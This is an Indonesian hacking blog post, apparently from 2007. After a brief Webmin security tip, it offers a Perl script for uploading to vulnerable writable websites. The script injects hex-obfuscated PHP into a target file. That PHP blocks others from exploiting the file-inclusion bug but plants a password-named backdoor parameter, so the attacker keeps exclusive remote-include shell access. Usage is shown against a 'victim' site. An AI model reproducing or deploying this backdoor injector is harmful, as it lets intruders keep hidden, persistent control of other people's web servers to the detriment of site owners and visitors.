Yang harus menjadi perhatian anda adalah masalah security yang ada dengan sistem anda jika anda menggunakan webmin ini untuk webserver/mail server dsb yang anda buka untuk public. Untuk itu silahkan anda setting di Webmin Configuration pilih IP Access Control. Seperti pada gambar


Gambar Webmin IP Access
Sumber Bacaan dari : http://www.webmin.com
Rewrite oleh: Warsono
Posted by admin Labels:



sebenernya gw rada bingung antara posting ne artikel, coz para netter di indonesia sebagian besar mase kurangnya kesadaran akan
cyber law di kalangan netter.
banyak yang deface web udda bangga, bikin bot, psy, and tools orang udah merajalela...
ya mungkin latar belakang pembelajaran aja gw mo posting ne artikel.... ;-)
ok,... pada bahasan kita kale ini untuk mengamankan site vulner yang writable, yach.. itung² cuman kita aja yang bisa masuk ke tu
shell inject'an and bantu² admin nge'pacth site...
alaaah,.... alasan pembenar....
ok tanpa basa-basi langsung aja langkah² nya:

1. Upload script di bawah ini di site vulner yang writable
--------[start code]-------------------------------------------------------------------------------------------
#!/usr/bin/perl

###############################################################################################

# #

# paths file php #

# file name : phppaths.pl #

# create by : dr.pluto / pluto_devils@yahoo.com #

# #

# cara manggunakan : perl phppaths.pl [bugs string] [file] #

# mass paths : find . -type f -name "*.php" -exec perl phppaths.pl [bugs string] {} \; #

# #

###############################################################################################

# set string #

###############################################################################################

$cbug = $ARGV[0]; # input bugs #

$filepaths = $ARGV[1]; # input file to paths #

$title = ".::[ Paths By: dr.pluto ]::."; # title paths #

$backdoor = "perintah"; # include (backdoor isset) #

###############################################################################################

# pesan mu (doble format php string) #

###############################################################################################

$pesan = "<center><font color=#FF0000 face=Verdana size=4><p><hr>Dilarang Keras mencoba aktifitas hacking di web
ini!!!</font><br> <font color=#00FFFF face=Verdana size=4>Patch
By: <a href=mailto:pluto_devils.com>dr.pluto<hr></a></font></center>";

###############################################################################################


$xscript = "\x3c\x3f\n\x69\x66\x20\x28\x24".$backdoor."\x20\x21\x3d\x20\x22\x22\x29\n\x7b\n
\x20\x69\x6e\x63\x6c\x75\x64\x65\x20\x28\x24".$backdoor."\x29\x3b\n\x7d\n\x20
\x24\x70\x72\x6f\x74\x65\x63\x74\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x20\x3d\x20
\x61\x72\x72\x61\x79\x28\x27".$cbug."\x27\x2c\x27\x63\x68\x64\x69\x72\x27\x29
\x3b\n\x20\x66\x6f\x72\x65\x61\x63\x68\x20\x28\x24\x70\x72\x6f\x74\x65\x63\x74
\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x20\x61\x73\x20\x24\x67\x6c\x6f\x62\x61\x6c\x29
\n\x20\x20\x20\x7b\n\x20\x20\x20\x20\x20\x20\x69\x66\x20\x28\x20\x69\x6e\x5f
\x61\x72\x72\x61\x79\x28\x24\x67\x6c\x6f\x62\x61\x6c\x20\x2c\x20\x61\x72\x72
\x61\x79\x5f\x6b\x65\x79\x73\x28\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x29\x29
\x20\x7c\x7c\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x5f\x61
\x72\x72\x61\x79\x28\x24\x67\x6c\x6f\x62\x61\x6c\x20\x2c\x20\x61\x72\x72\x61
\x79\x5f\x6b\x65\x79\x73\x28\x24\x5f\x47\x45\x54\x29\x29\x20\x20\x20\x20\x20
\x7c\x7c\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x5f\x61\x72
\x72\x61\x79\x28\x24\x67\x6c\x6f\x62\x61\x6c\x20\x2c\x20\x61\x72\x72\x61\x79
\x5f\x6b\x65\x79\x73\x28\x24\x5f\x50\x4f\x53\x54\x29\x29\x20\x20\x20\x20\x7c
\x7c\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x5f\x61\x72\x72
\x61\x79\x28\x24\x67\x6c\x6f\x62\x61\x6c\x20\x2c\x20\x61\x72\x72\x61\x79\x5f
\x6b\x65\x79\x73\x28\x24\x5f\x43\x4f\x4f\x4b\x49\x45\x29\x29\x20\x20\x7c\x7c
\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x5f\x61\x72\x72\x61
\x79\x28\x24\x67\x6c\x6f\x62\x61\x6c\x20\x2c\x20\x61\x72\x72\x61\x79\x5f\x6b
\x65\x79\x73\x28\x24\x5f\x46\x49\x4c\x45\x53\x29\x29\x29\x20\n\x20\x20\x20
\x20\x20\x20\x20\x20\x20\x20\x20\x7b\n\x20\x20\x20\x20\x20\x20\x20\x20\x20
\x20\x20\x20\x20\x64\x69\x65\x28\x22\x3c\x74\x69\x74\x6c\x65\x3e$title\x3c\x2f
\x74\x69\x74\x6c\x65\x3e\x3c\x73\x74\x79\x6c\x65\x3e\x62\x6f\x64\x79\x20\x7b
\x9\x62\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x2d\x63\x6f\x6c\x6f\x72\x3a\x20
\x23\x30\x30\x30\x30\x30\x30\x3b\x7d\x20\x3c\x2f\x73\x74\x79\x6c\x65
\x3e".$pesan."\x22\x29\x3b\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7d
\n\x20\x20\x20\x7d\n\x3f\x3e\n";

$msgnull = "======================\npath web php ver 0.1\ncreate
by : dr.pluto\n======================\ncara panggunaan : perl phppaths.pl [bug string]
[file]\nContoh:\n perl phppaths.pl page index.php \n";


if (! $cbug)

{

die($msgnull);

};


if (! $filepaths)

{

die($msgnull);

};


open(TEMP, "> /tmp/plutoganteng")|| die "ada yang salah: $!" ;

printf TEMP $xscript ;

close(TEMP);

system ('cat /tmp/plutoganteng '.$filepaths.' > /tmp/pathsweb');

system ('cat /tmp/pathsweb > '.$filepaths);

system ('rm -f /tmp/pathsweb /tmp/plutoganteng');


print "======================\n";

print "path web php ver 0.1\n";

print "create by : dr.pluto\n";

print "======================\n";

print "info :\n";

print "Bug string :".$cbug."\n";

print "File to path :".$filepaths."\n";


#EOF


--------[Garis ini jangan di ketik lo bo]--------------------------------------------------------------------------------------------

untuk menjalankanya sintax nya sebagai berikut:

perl phppaths.pl [bugs string] [file]

missal halaman yang akan di pacth index.php and target nya www.victim.com/index.php?page=[evil script]
edit $backdoor ="password kamu" biar kamu aja yang bisa masuk di tu shell
misal $backdoor ="pirate";
untuk menjalankanya :

ssh.0-1$perl phppaths.pl page index.php
======================
path web php ver 0.1
create by : dr.pluto
======================
info :
Bug string : page
File to path : index.php

untuk masuk ke shell kamu sekarang udah berubah url nya menjadi:

www.victim.com/index.php?pirate=[evil script]


sekian.... semoga berguna....
Posted by admin Labels:
Visit the Site
Privacy Statement
Copyright 2007, pirate-unsecure